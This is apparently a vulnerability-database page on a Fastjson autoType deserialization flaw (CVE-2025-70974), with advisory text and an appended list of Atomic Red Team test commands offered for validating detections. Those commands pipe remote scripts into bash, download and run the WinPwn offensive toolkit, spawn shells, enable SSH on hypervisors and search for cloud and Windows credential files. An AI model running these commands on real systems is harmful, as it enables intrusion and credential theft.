CVE-2025-70974
Overview
This vulnerability is a deserialization flaw in Alibaba Fastjson's autoType feature, which mishandles the @type key in JSON documents. When the @type value corresponds to a Java class name, the parser may invoke certain public methods of that class during deserialization. The root cause is an incomplete validation and filtering mechanism for autoType, affecting Fastjson versions prior to 1.2.48.
Vulnerability Description
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on affected systems by supplying crafted JSON payloads containing malicious JNDI references. This can lead to full system compromise, data exfiltration, or service disruption. The attack requires only network access to an application that deserializes JSON using vulnerable Fastjson versions, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N).
Solution
Upgrade Alibaba Fastjson to version 1.2.48 or later, as this version includes the necessary fixes for the autoType deserialization issue. Refer to the official Fastjson GitHub repository comparison between versions 1.2.47 and 1.2.48 for patch details (https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48). Additional information and advisories are available at Seebug (https://www.seebug.org/vuldb/ssvid-98020) and CNVD (https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238).
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the mishandling of the autoType feature in the Fastjson library, a widely used JSON parsing tool in Java applications. This flaw is particularly concerning as it allows for the deserialization of untrusted data. When a JSON document contains an @type key, and its value corresponds to a Java class name, the library may inadvertently invoke public methods of that class. This behavior can lead to unintended consequences, especially if those methods are designed to interact with external resources or perform sensitive operations. The root cause of this issue is an incomplete fix for a previous vulnerability, indicating a systemic weakness in the library's handling of type information during deserialization.
Attack vectors exploiting this vulnerability can be diverse and sophisticated. An attacker can craft a malicious JSON payload that includes the @type key pointing to a class within the target application. By embedding a JNDI (Java Naming and Directory Interface) injection payload within the JSON document, the attacker can manipulate the application into making calls to external resources, potentially leading to remote code execution or data exfiltration. The exploitation of this vulnerability has been observed in the wild, highlighting its practicality and the ease with which attackers can leverage it. Scenarios may include web applications that accept JSON input from users or external systems, making them prime targets for such attacks.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Fastjson for JSON processing. Given the CVSS score of 10.0, it represents a critical risk, as successful exploitation can lead to severe consequences, including unauthorized access to sensitive data, disruption of services, and potential compromise of the entire application environment. Businesses that fail to address this vulnerability may face reputational damage, regulatory penalties, and financial losses stemming from data breaches or service outages. The potential for widespread exploitation underscores the urgency for organizations to prioritize remediation efforts.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First, it is essential to conduct a thorough inventory of all applications utilizing the Fastjson library, ensuring that they are updated to the latest version, which addresses the vulnerability. Implementing input validation and sanitization measures can help prevent the injection of malicious payloads. Additionally, organizations should consider employing security tools that can analyze JSON payloads for anomalies and potential threats. Regular security assessments and penetration testing can also aid in identifying and mitigating risks associated with this vulnerability.
In conclusion, the vulnerability associated with the Fastjson library presents a critical threat to Java applications that process JSON data. The potential for exploitation through JNDI injection highlights the need for robust security practices and proactive measures to safeguard against such risks. Organizations must remain vigilant, ensuring that they are not only aware of the vulnerabilities in their software components but also equipped with the necessary strategies to detect, mitigate, and respond to potential threats effectively. By prioritizing security in the software development lifecycle, businesses can better protect themselves against the evolving landscape of cyber threats.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-70974 |
| github.com |
GitHub CVE
|
https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48 |
| seebug.org |
GitHub CVE
|
https://www.seebug.org/vuldb/ssvid-98020 |
| cnvd.org.cn |
GitHub CVE
|
https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238 |
| freebuf.com |
GitHub CVE
|
https://www.freebuf.com/vuls/208339.html |
| github.com |
GitHub CVE
|
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce |
| cloudsek.com |
GitHub CVE
|
https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger |
| cert.360.cn |
GitHub CVE
|
https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 |